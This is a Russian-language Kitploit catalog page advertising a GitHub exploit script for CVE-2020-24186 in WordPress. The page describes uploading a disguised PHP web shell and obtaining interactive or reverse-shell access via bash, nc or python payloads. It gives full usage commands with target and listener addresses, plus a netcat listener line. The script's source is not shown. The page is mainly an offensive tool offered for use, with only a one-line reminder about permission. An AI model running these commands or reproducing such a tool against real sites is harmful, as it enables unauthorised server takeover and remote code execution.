Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-24186 — Эксплойт-скрипт для CVE-2020-24186 в WordPress, который загружает замаскированную PHP веб-шелл и предоставляет интерактивный или реверсивный доступ к оболочке с опциональной автоматизацией слушателя pwntools. | Kitploit
Инструменты/GitHubGitHub/gazettel/cve-2020-24186
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Эксплойт-скрипт для CVE-2020-24186 в WordPress, который загружает замаскированную PHP веб-шелл и предоставляет интерактивный или реверсивный доступ к оболочке с опциональной автоматизацией слушателя pwntools.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-24186

Этот скрипт эксплуатирует уязвимость CVE-2020-24186 в WordPress для загрузки замаскированной PHP-нагрузки и получения оболочки на целевой системе. Существует три режима работы:

  1. Интерактивная оболочка:
    Загружает базовую веб-оболочку и переходит в интерактивный режим, позволяя отправлять команды через параметр cmd.

  2. Ручная обратная оболочка:
    Загружает веб-оболочку и отправляет нагрузку обратной оболочки, но не запускает прослушиватель автоматически. Вы должны вручную запустить свой собственный прослушиватель на указанном IP и порту.

  3. Обратная оболочка с pwntools:
    Загружает веб-оболочку, отправляет нагрузку обратной оболочки, и скрипт автоматически запускает прослушиватель с помощью pwntools для захвата обратного соединения.

Требования

  • Python 3.x
  • Библиотеки Python:
    • requests
    • pwn (pwntools)
  • (Опционально) Настройка прокси, если вы хотите направлять трафик (например, для тестирования с Burp Suite).

Параметры использования

  • --url: Базовый URL целевого сайта (например, http://10.10.110.119).
  • --blogpath: Путь к публикации (по умолчанию: /?page=1).
  • --mode: Режим работы: interactive или reverse.
  • --lhost: Локальный IP для обратной оболочки (обязательно в режиме reverse).
  • --lport: Локальный порт для обратной оболочки (обязательно в режиме reverse).
  • --reverse_method: Метод обратной оболочки: bash, nc или python (по умолчанию bash).
  • --manual: При использовании в режиме reverse скрипт не будет запускать прослушиватель; вы должны вручную запустить свой собственный прослушиватель.
  • --use-proxy: Если установлен, запросы будут отправляться через настроенный прокси.

Примеры

1. Интерактивная оболочка

Загрузить веб-оболочку и начать интерактивный сеанс для отправки команд:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. Обратная оболочка в ручном режиме

Загрузить веб-оболочку, отправить нагрузку обратной оболочки, но не запускать прослушиватель автоматически. Запустите свой собственный прослушиватель вручную (например, с помощью netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

Затем в другом терминале запустите прослушиватель вручную:

root@kitploit:~
nc -lvnp 9002

1. Обратная оболочка с pwntools

Загрузите веб-оболочку, отправьте нагрузку обратной оболочки, и скрипт автоматически запустит прослушиватель с помощью pwntools для захвата соединения:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

Скрипт будет ожидать соединение на 10.10.1.1:9002 и, когда соединение установлено, предоставит интерактивную оболочку.

Примечания Убедитесь, что целевой сайт уязвим к CVE-2020-24186 и что у вас есть необходимые разрешения для тестирования безопасности. Вы можете изменить PHP-нагрузку с помощью опции --php_payload, если требуются корректировки. Дважды проверьте настройки прокси, если вы используете флаг --use-proxy.

Скачать инструмент